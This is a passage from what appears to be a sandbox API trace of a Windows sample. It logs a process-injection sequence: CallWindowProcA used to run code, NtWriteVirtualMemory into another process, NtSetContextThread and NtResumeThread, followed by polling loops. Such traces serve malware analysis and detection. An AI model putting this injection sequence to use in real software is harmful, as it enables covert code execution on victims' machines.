[410]=0x4d, [411]=0x0, [412]=0x53, [413]=0x0, [414]=0x20, [415]=0x0, [416]=0x53, [417]=0x0, [418]=0x61, [419]=0x0, [420]=0x6e, [421]=0x0, [422]=0x73, [423]=0x0, [424]=0x20, [425]=0x0, [426]=0x53, [427]=0x0, [428]=0x65, [429]=0x0, [430]=0x72, [431]=0x0, [432]=0x69, [433]=0x0, [434]=0x66, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x44, [477]=0x42, [478]=0x1, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x60, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0xec, [489]=0x9, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x90, [495]=0x1, [496]=0x0, [497]=0x0, [498]=0x4d, [499]=0x0, [500]=0x53, [501]=0x0, [502]=0x20, [503]=0x0, [504]=0x53, [505]=0x0, [506]=0x61, [507]=0x0, [508]=0x6e, [509]=0x0, [510]=0x73, [511]=0x0))) returned 0x0 [0195.805] GetLastError () returned 0x578 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f774 | out: ppsaOut=0x18f774) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.805] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.805] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f644 | out: ppsaOut=0x18f644) returned 0x0 [0195.806] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.806] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.806] NtWriteVirtualMemory (in: ProcessHandle=0x100, BaseAddress=0x7efde008, Buffer=0x4070c0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x4070c0*, NumberOfBytesWritten=0x0) returned 0x0 [0195.806] GetLastError () returned 0x578 [0195.806] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.806] VarAdd (in: pvarLeft=0x4070b0, pvarRight=0x18f770, pvarResult=0x18f760 | out: pvarResult=0x18f760) returned 0x0 [0195.806] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f6a8 | out: ppsaOut=0x18f6a8) returned 0x0 [0195.806] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.806] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.806] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.806] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.806] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.806] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.807] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.807] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f578 | out: ppsaOut=0x18f578) returned 0x0 [0195.807] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.807] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.807] NtWriteVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f6ac, Buffer=0x3814348*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x3814348*, NumberOfBytesWritten=0x0) returned 0x0 [0195.807] GetLastError () returned 0x578 [0195.807] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f75c | out: ppsaOut=0x18f75c) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.807] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.807] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.808] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.808] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.808] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.808] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.808] NtSetContextThread (ThreadHandle=0xfc, Context=0x5def18*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401364, Ebp=0x0, Eip=0x77e301c4, SegCs=0x23, EFlags=0x202, Esp=0x44fb10, SegSs=0x2b, ExtendedRegisters=([0]=0xd7, [1]=0xcf, [2]=0x0, [3]=0x0, [4]=0xdf, [5]=0x3f, [6]=0x10, [7]=0x7, [8]=0xd6, [9]=0xcf, [10]=0x0, [11]=0x9, [12]=0x55, [13]=0x8b, [14]=0xec, [15]=0x83, [16]=0xc4, [17]=0xf4, [18]=0x60, [19]=0x8b, [20]=0x4d, [21]=0x10, [22]=0x89, [23]=0x4d, [24]=0xfc, [25]=0x3, [26]=0x4d, [27]=0x14, [28]=0x89, [29]=0x4d, [30]=0xf4, [31]=0x8b, [32]=0x4d, [33]=0x10, [34]=0x8a, [35]=0x1, [36]=0x88, [37]=0x45, [38]=0xfb, [39]=0x8b, [40]=0x4d, [41]=0xc, [42]=0x8b, [43]=0x75, [44]=0x8, [45]=0x8b, [46]=0xfe, [47]=0x8a, [48]=0x6, [49]=0x46, [50]=0x32, [51]=0x45, [52]=0xfb, [53]=0x56, [54]=0x50, [55]=0xff, [56]=0x45, [57]=0xfc, [58]=0x8b, [59]=0x75, [60]=0xfc, [61]=0x8a, [62]=0x6, [63]=0x46, [64]=0x8b, [65]=0x5d, [66]=0xf4, [67]=0x39, [68]=0x5d, [69]=0xfc, [70]=0x75, [71]=0xb, [72]=0x8b, [73]=0x5d, [74]=0x10, [75]=0x89, [76]=0x5d, [77]=0xfc, [78]=0x8b, [79]=0xf3, [80]=0x8a, [81]=0x6, [82]=0x46, [83]=0x88, [84]=0x45, [85]=0xfb, [86]=0x58, [87]=0x5e, [88]=0x88, [89]=0x7, [90]=0x47, [91]=0x49, [92]=0x75, [93]=0xd1, [94]=0x61, [95]=0xc9, [96]=0xc2, [97]=0x10, [98]=0x0, [99]=0x0, [100]=0xdf, [101]=0x3f, [102]=0x10, [103]=0x7, [104]=0xc1, [105]=0xcf, [106]=0x0, [107]=0xc, [108]=0x4c, [109]=0x77, [110]=0x40, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x6c, [117]=0xf0, [118]=0x5d, [119]=0x0, [120]=0xcc, [121]=0xa8, [122]=0x37, [123]=0x2, [124]=0x54, [125]=0xa8, [126]=0x37, [127]=0x2, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x80, [137]=0xe6, [138]=0x96, [139]=0x72, [140]=0x6, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x6, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xf, [153]=0x10, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x10, [161]=0x2b, [162]=0x40, [163]=0x0, [164]=0xa4, [165]=0x2b, [166]=0x40, [167]=0x0, [168]=0xf0, [169]=0x2b, [170]=0x40, [171]=0x0, [172]=0x4c, [173]=0x2c, [174]=0x40, [175]=0x0, [176]=0xb8, [177]=0x2c, [178]=0x40, [179]=0x0, [180]=0x14, [181]=0x2d, [182]=0x40, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xc4, [197]=0x3f, [198]=0x10, [199]=0x1c, [200]=0xc1, [201]=0xcf, [202]=0x0, [203]=0x8, [204]=0x20, [205]=0x2f, [206]=0x74, [207]=0x76, [208]=0x4, [209]=0x2f, [210]=0x74, [211]=0x76, [212]=0xd4, [213]=0x2e, [214]=0x74, [215]=0x76, [216]=0xb4, [217]=0x2e, [218]=0x74, [219]=0x76, [220]=0x98, [221]=0x2e, [222]=0x74, [223]=0x76, [224]=0x84, [225]=0x2e, [226]=0x74, [227]=0x76, [228]=0xc8, [229]=0xb, [230]=0x73, [231]=0x76, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xc4, [237]=0xf0, [238]=0x5d, [239]=0x0, [240]=0x1, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0xe8, [253]=0xb, [254]=0x73, [255]=0x76, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0xc4, [261]=0xf0, [262]=0x5d, [263]=0x0, [264]=0x1, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x44, [273]=0x42, [274]=0x1, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x60, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0xec, [285]=0x9, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x90, [291]=0x1, [292]=0x0, [293]=0x0, [294]=0x4d, [295]=0x0, [296]=0x53, [297]=0x0, [298]=0x20, [299]=0x0, [300]=0x53, [301]=0x0, [302]=0x61, [303]=0x0, [304]=0x6e, [305]=0x0, [306]=0x73, [307]=0x0, [308]=0x20, [309]=0x0, [310]=0x53, [311]=0x0, [312]=0x65, [313]=0x0, [314]=0x72, [315]=0x0, [316]=0x69, [317]=0x0, [318]=0x66, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xc3, [365]=0x7, [366]=0xa, [367]=0x65, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x1, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x26, [381]=0x3f, [382]=0x10, [383]=0xfe, [384]=0xda, [385]=0xcf, [386]=0x0, [387]=0x8, [388]=0x80, [389]=0x38, [390]=0x1, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x60, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xec, [401]=0x9, [402]=0x0, [403]=0x0, [404]=0x1, [405]=0x0, [406]=0x90, [407]=0x1, [408]=0x0, [409]=0x0, [410]=0x4d, [411]=0x0, [412]=0x53, [413]=0x0, [414]=0x20, [415]=0x0, [416]=0x53, [417]=0x0, [418]=0x61, [419]=0x0, [420]=0x6e, [421]=0x0, [422]=0x73, [423]=0x0, [424]=0x20, [425]=0x0, [426]=0x53, [427]=0x0, [428]=0x65, [429]=0x0, [430]=0x72, [431]=0x0, [432]=0x69, [433]=0x0, [434]=0x66, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x44, [477]=0x42, [478]=0x1, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x60, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0xec, [489]=0x9, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x90, [495]=0x1, [496]=0x0, [497]=0x0, [498]=0x4d, [499]=0x0, [500]=0x53, [501]=0x0, [502]=0x20, [503]=0x0, [504]=0x53, [505]=0x0, [506]=0x61, [507]=0x0, [508]=0x6e, [509]=0x0, [510]=0x73, [511]=0x0))) returned 0x0 [0195.808] GetLastError () returned 0x578 [0195.808] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.808] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f75c | out: ppsaOut=0x18f75c) returned 0x0 [0195.809] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.809] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.809] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.809] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.809] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f66c | out: ppsaOut=0x18f66c) returned 0x0 [0195.809] SafeArrayDestroyDescriptor (psa=0x5e3148) returned 0x0 [0195.809] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0195.809] NtResumeThread (in: ThreadHandle=0xfc, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.826] GetLastError () returned 0x578 [0195.826] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.826] GetCurrentProcessId () returned 0xa38 [0195.827] GetWindowLongA (hWnd=0x5028e, nIndex=-16) returned 1409351809 [0195.827] IsIconic (hWnd=0x7028c) returned 0 [0195.827] GetParent (hWnd=0x5028e) returned 0x502a0 [0195.827] TranslateMessage (lpMsg=0x18f67c) returned 0 [0195.827] DispatchMessageA (lpMsg=0x18f67c) returned 0x0 [0195.827] GetWindowLongA (hWnd=0x5028e, nIndex=-16) returned 1409351809 [0195.827] CallWindowProcA (lpPrevWndFunc=0x77e9abe9, hWnd=0x5028e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0195.827] PeekMessageA (in: lpMsg=0x18f5f8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18f5f8) returned 0 [0195.827] GetTickCount () returned 0x36a37 [0195.827] CoFreeUnusedLibraries () [0195.827] GetTickCount () returned 0x36a37 [0195.828] IsWindowVisible (hWnd=0x7028c) returned 0 [0195.828] Sleep (dwMilliseconds=0x0) [0195.874] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0195.875] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0195.875] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0195.875] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11612e5 [0195.875] GetTickCount () returned 0x36a65 [0195.875] GetLastError () returned 0x578 [0195.875] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.875] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0195.876] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0195.876] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0195.876] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11612e5 [0195.876] GetTickCount () returned 0x36a65 [0195.876] GetLastError () returned 0x578 [0195.876] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.876] GetCurrentProcessId () returned 0xa38 [0195.876] CoFreeUnusedLibraries () [0195.876] GetTickCount () returned 0x36a65 [0195.876] GetTickCount () returned 0x36a65 [0195.876] IsWindowVisible (hWnd=0x7028c) returned 0 [0195.876] Sleep (dwMilliseconds=0x0) [0195.921] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0195.922] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0195.922] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0195.922] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161314 [0195.922] GetTickCount () returned 0x36a94 [0195.922] GetLastError () returned 0x578 [0195.922] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.922] GetCurrentProcessId () returned 0xa38 [0195.922] CoFreeUnusedLibraries () [0195.922] GetTickCount () returned 0x36a94 [0195.922] GetTickCount () returned 0x36a94 [0195.922] IsWindowVisible (hWnd=0x7028c) returned 0 [0195.922] Sleep (dwMilliseconds=0x0) [0195.968] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0195.969] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0195.969] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0195.969] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161343 [0195.969] GetTickCount () returned 0x36ac3 [0195.969] GetLastError () returned 0x578 [0195.969] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0195.969] GetCurrentProcessId () returned 0xa38 [0195.969] CoFreeUnusedLibraries () [0195.969] GetTickCount () returned 0x36ac3 [0195.969] GetTickCount () returned 0x36ac3 [0195.969] IsWindowVisible (hWnd=0x7028c) returned 0 [0195.970] Sleep (dwMilliseconds=0x0) [0196.015] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.015] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.015] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.015] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1161372 [0196.015] GetTickCount () returned 0x36af2 [0196.015] GetLastError () returned 0x578 [0196.015] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.015] GetCurrentProcessId () returned 0xa38 [0196.016] CoFreeUnusedLibraries () [0196.016] GetTickCount () returned 0x36af2 [0196.016] GetTickCount () returned 0x36af2 [0196.016] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.016] Sleep (dwMilliseconds=0x0) [0196.061] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.062] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.062] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.062] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11613a1 [0196.062] GetTickCount () returned 0x36b21 [0196.062] GetLastError () returned 0x578 [0196.062] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.062] GetCurrentProcessId () returned 0xa38 [0196.063] CoFreeUnusedLibraries () [0196.063] GetTickCount () returned 0x36b21 [0196.063] GetTickCount () returned 0x36b21 [0196.063] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.063] Sleep (dwMilliseconds=0x0) [0196.108] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.109] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.109] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.109] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11613cf [0196.109] GetTickCount () returned 0x36b4f [0196.109] GetLastError () returned 0x578 [0196.109] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.109] GetCurrentProcessId () returned 0xa38 [0196.109] CoFreeUnusedLibraries () [0196.109] GetTickCount () returned 0x36b4f [0196.109] GetTickCount () returned 0x36b4f [0196.109] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.109] Sleep (dwMilliseconds=0x0) [0196.156] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.157] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.157] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.157] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11613fe [0196.157] GetTickCount () returned 0x36b7e [0196.157] GetLastError () returned 0x578 [0196.157] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.157] GetCurrentProcessId () returned 0xa38 [0196.157] CoFreeUnusedLibraries () [0196.157] GetTickCount () returned 0x36b7e [0196.158] GetTickCount () returned 0x36b7e [0196.158] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.158] Sleep (dwMilliseconds=0x0) [0196.202] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.203] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.203] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.203] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116142d [0196.203] GetTickCount () returned 0x36bad [0196.203] GetLastError () returned 0x578 [0196.203] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.203] GetCurrentProcessId () returned 0xa38 [0196.204] CoFreeUnusedLibraries () [0196.204] GetTickCount () returned 0x36bad [0196.204] GetTickCount () returned 0x36bad [0196.204] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.204] Sleep (dwMilliseconds=0x0) [0196.249] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.249] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.249] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.249] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116145c [0196.249] GetTickCount () returned 0x36bdc [0196.249] GetLastError () returned 0x578 [0196.250] SafeArrayDestroyDescriptor (psa=0x5e3118) returned 0x0 [0196.250] GetCurrentProcessId () returned 0xa38 [0196.250] CoFreeUnusedLibraries () [0196.250] GetTickCount () returned 0x36bdc [0196.250] GetTickCount () returned 0x36bdc [0196.250] IsWindowVisible (hWnd=0x7028c) returned 0 [0196.250] Sleep (dwMilliseconds=0x0) [0196.295] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0196.296] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0196.296] SafeArrayDestroyDescriptor (psa=0x5e3158) returned 0x0 [0196.296] CallWindowProcA 